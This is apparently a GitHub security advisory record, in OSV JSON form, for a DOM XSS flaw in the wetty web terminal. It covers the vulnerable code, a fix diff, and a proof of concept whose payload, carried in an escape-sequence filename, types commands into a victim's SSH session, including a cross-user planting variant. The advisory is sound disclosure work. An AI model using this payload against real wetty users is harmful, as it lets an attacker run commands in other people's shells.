{"id":"GHSA-p26j-h7wj-r568","summary":"wetty vulnerable to DOM XSS via file-download filename","details":"### Summary\n\nThe wetty client decodes a base64 filename from the file-download escape sequence and interpolates it raw into a Toastify HTML string (`escapeMarkup: false`). Any output the victim renders - a `cat`'d file, a tailed log, an SSH MOTD, a `curl` response - that contains `\\x1b[5i...:...\\x1b[4i` runs script in the wetty origin and types attacker-chosen keystrokes into the victim's SSH session.\n\n### Preconditions\n\n- Victim has wetty open with an active SSH session.\n- Attacker delivers the file-download escape sequence (`\\x1b[5i\u003cb64-name\u003e:\u003cb64-content\u003e\\x1b[4i`) into output the victim's terminal renders.\n- Default configuration; no non-default flags required.\n\n### Details\n\n```typescript\n// src/client/wetty.ts:37, 46-62\nconst fileDownloader = new FileDownloader();\n// ...\nsocket.on('data', (data: string) =\u003e {\n  const remainingData = fileDownloader.buffer(data);\n  // every PTY byte forwarded by the server passes through buffer()\n  // ...\n})\n```\n\nEvery byte the server forwards from the PTY passes through `FileDownloader.buffer`. The buffer scans for the documented file-download markers `\\x1b[5i` (begin) and `\\x1b[4i` (end) - documented in `docs/downloading-files.md` - and, on a complete match, hands the inner payload to `onCompleteFile`.\n\n```typescript\n// src/client/wetty/download.ts:9-77\nfunction onCompleteFile(bufferCharacters: string): void {\n  let fileNameBase64;\n  let fileCharacters = bufferCharacters;\n  if (bufferCharacters.includes(':')) {\n    [fileNameBase64, fileCharacters] = bufferCharacters.split(':');\n  }\n  // ...\n  void detectAndDownload(bytes, fileCharacters, fileNameBase64);\n}\n\nasync function detectAndDownload(/* ... */): Promise\u003cvoid\u003e {\n  // ...\n  let fileName;\n  try {\n    if (fileNameBase64 !== undefined) {\n      fileName = window.atob(fileNameBase64);            // attacker-controlled\n    }\n  } catch { /* ... */ }\n  fileName ??= `file-${ /* timestamp default */ }`;\n  // ...\n  Toastify({\n    text: `Download ready: \u003ca href=\"${blobUrl}\" target=\"_blank\" `\n        + `download=\"${fileName}\"\u003e${fileName}\u003c/a\u003e`,     // sink\n    duration: 10000,\n    // ...\n    escapeMarkup: false,\n  }).showToast();\n}\n```\n\n`fileName` is base64-decoded from the escape-sequence payload, then interpolated twice into a string that Toastify renders as raw HTML (`escapeMarkup: false`). No HTML escaping runs between `atob` and the toast markup. The wetty client exposes the live terminal as `window.wetty_term`, and `term.input(data, true)` (`src/client/wetty/term.ts:80, 93-97, 132, 145-198`) fires xterm.js's `onData`, which `src/client/wetty.ts:40-42` forwards as a socket `input` event - i.e., script in the wetty origin types into the victim's SSH session.\n\n### Proof of concept\n\n**Setup**\n\n1. Bring up wetty and its bundled SSH host from a fresh clone:\n\n   ```bash\n   git clone https://github.com/butlerx/wetty\n   cd wetty\n   docker compose up -d\n   sleep 5\n   ```\n\n2. Open `http://localhost/wetty` in a browser. The login terminal prompts for a username (enter `term`) then proxies to `wetty-ssh`, which prompts for the SSH password (also `term`, set in `containers/ssh/Dockerfile`). The browser tab now holds a shell on the SSH container.\n\n**Exploit**\n\n1. In the SSH session, build and emit the escape sequence. The filename portion carries the HTML payload; the content portion is a short literal so the toast renders quickly:\n\n   ```bash\n   PAYLOAD='\"\u003e\u003cimg src=x onerror=\"window.wetty_term.input(\\\"id \u003e /tmp/pwned\\\\n\\\",true)\"\u003e'\n   FNAME_B64=$(printf '%s' \"$PAYLOAD\" | base64 -w0)\n   DATA_B64=$(printf 'bait' | base64 -w0)\n   printf '\\x1b[5i%s:%s\\x1b[4i' \"$FNAME_B64\" \"$DATA_B64\"\n   ```\n\n   Expected: a Toastify notification appears at the bottom-right of the wetty page. Its DOM contains the attacker-supplied `\u003cimg\u003e` element with the `onerror` handler.\n\n2. The `onerror` handler calls `window.wetty_term.input(\"id \u003e /tmp/pwned\\n\", true)`, which xterm.js dispatches as a `data` event; `src/client/wetty.ts:40-42` forwards it as a socket `input` event; the server writes it to the PTY. The SSH host runs `id \u003e /tmp/pwned` as the connected user:\n\n   ```bash\n   cat /tmp/pwned\n   ```\n\n   Expected: `uid=1000(term) gid=1000(term) groups=1000(term)`.\n\n3. The same chain works cross-user. On a shared SSH host, a low-privileged user plants the sequence in a file the higher-privileged user reads via wetty:\n\n   ```bash\n   # As the low-priv user on the SSH host\n   printf '\\x1b[5i%s:%s\\x1b[4i' \"$FNAME_B64\" \"$DATA_B64\" \u003e /tmp/notes.txt\n   ```\n\n   When the higher-privileged user's wetty session runs `cat /tmp/notes.txt`, attacker-controlled JavaScript types commands into that user's shell.\n\n### Impact\n\n- **Confidentiality:** Reads the rendered terminal contents via `window.wetty_term.buffer.active`.\n- **Integrity:** Types attacker-chosen commands into the victim's SSH session via `window.wetty_term.input()`.\n- **Auth:** A writer of content the victim renders gains keystroke injection in the victim's higher-privileged session - a path from any local SSH user to commands as the wetty user.\n\n### Suggestions to fix\n\n\u003e _This has not been tested - it is illustrative only._\n\nHTML-escape the decoded filename before interpolating it into Toastify's HTML markup at `src/client/wetty/download.ts:67-77`.\n\n```diff\n   fileName ??= `file-${new Date()\n     .toISOString()\n     .split('.')[0]\n     .replace(/-/g, '')\n     .replace('T', '')\n     .replace(/:/g, '')}${fileExt ? `.${fileExt}` : ''}`;\n+  const safeName = fileName.replace(/[&\u003c\u003e\"']/g, (c) =\u003e\n+    ({ '&': '&amp;', '\u003c': '&lt;', '\u003e': '&gt;', '\"': '&quot;', \"'\": '&#39;' })[c] ?? c,\n+  );\n\n   const blob = new Blob([bytes.buffer as ArrayBuffer], { type: mimeType });\n   const blobUrl = URL.createObjectURL(blob);\n\n   Toastify({\n-    text: `Download ready: \u003ca href=\"${blobUrl}\" target=\"_blank\" download=\"${fileName}\"\u003e${fileName}\u003c/a\u003e`,\n+    text: `Download ready: \u003ca href=\"${blobUrl}\" target=\"_blank\" download=\"${safeName}\"\u003e${safeName}\u003c/a\u003e`,\n     duration: 10000,\n```","aliases":["CVE-2026-49864"],"modified":"2026-07-01T18:41:31.700322Z","published":"2026-07-01T18:19:39Z","database_specific":{"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-07-01T18:19:39Z","nvd_published_at":null,"cwe_ids":["CWE-79"]},"references":[{"type":"WEB","url":"https://github.com/butlerx/wetty/security/advisories/GHSA-p26j-h7wj-r568"},{"type":"PACKAGE","url":"https://github.com/butlerx/wetty"}],"affected":[{"package":{"name":"wetty","ecosystem":"npm","purl":"pkg:npm/wetty"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"3.0.4"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/07/GHSA-p26j-h7wj-r568/GHSA-p26j-h7wj-r568.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N"}]}